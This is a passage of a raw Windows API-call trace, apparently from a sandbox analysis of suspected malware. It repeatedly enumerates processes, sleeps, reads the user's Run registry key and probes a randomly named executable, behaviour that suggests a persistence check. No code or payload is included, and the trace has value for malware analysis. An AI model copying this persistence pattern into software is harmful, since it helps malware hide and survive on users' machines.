BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0292.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0292.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0292.707] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0292.708] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0292.710] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0292.711] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0292.711] NtClose (Handle=0x338) returned 0x0 [0292.711] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.711] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.711] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddfa0) returned 1 [0292.711] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.712] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.712] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5deba0) returned 1 [0292.712] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0292.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0292.716] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0292.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0292.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0292.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0292.865] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0292.867] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0292.868] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0292.868] NtClose (Handle=0x338) returned 0x0 [0292.868] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.868] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.869] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0292.869] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.869] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.869] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5ddda0) returned 1 [0292.869] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0292.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0292.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0292.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0292.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0292.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0292.977] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0292.978] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0292.979] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0292.979] NtClose (Handle=0x338) returned 0x0 [0292.979] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.980] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.980] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de3a0) returned 1 [0292.980] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0292.980] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0292.980] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de7a0) returned 1 [0292.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0292.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0292.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0292.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0292.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0293.204] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0293.204] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0293.206] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0293.207] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0293.207] NtClose (Handle=0x338) returned 0x0 [0293.207] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.207] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.207] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de520) returned 1 [0293.207] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.207] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.207] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0293.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0293.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0293.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0293.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0293.211] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0293.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0293.326] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0293.327] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0293.329] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0293.329] NtClose (Handle=0x338) returned 0x0 [0293.329] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.329] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.330] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de420) returned 1 [0293.330] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.330] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.330] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0293.330] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0293.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0293.333] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0293.333] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0293.333] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0293.457] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0293.459] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0293.460] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0293.461] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0293.462] NtClose (Handle=0x338) returned 0x0 [0293.462] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.462] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, IoStatusBlock=0xde824*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.462] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de920) returned 1 [0293.462] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xdea38, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.462] NtCreateFile (in: FileHandle=0xdea58, DesiredAccess=0x120089, ObjectAttributes=0xdea20*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdea40, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdea58*=0x0, IoStatusBlock=0xdea40*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0293.462] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x5de2a0) returned 1 [0293.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x4e0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0293.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0xc0000004 [0293.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0293.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4e0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0293.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4e0000, ResultLength=0x0) returned 0x0 [0293.573] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0293.573] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0293.575] NtCreateKey (in: KeyHandle=0xdea70, DesiredAccess=0x20219, ObjectAttributes=0xde1e0*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea70*=0x338) returned 0x0 [0293.576] NtEnumerateValueKey (in: KeyHandle=0x338, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde434, Length=0x200, ResultLength=0xde834 | out: KeyValueInformation=0xde434, ResultLength=0xde834) returned 0x0 [0293.576] NtClose (Handle=0x338) returned 0x0 [0293.576] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtPathName=0xde81c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0293.576] NtCreateFile (in: FileHandle=0xde83c, DesiredAccess=0x120089, ObjectAttributes=0xde804*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Wrvtps4_h\\Cookiesclrpdxk8.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xde824, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xde83c*=0x0, 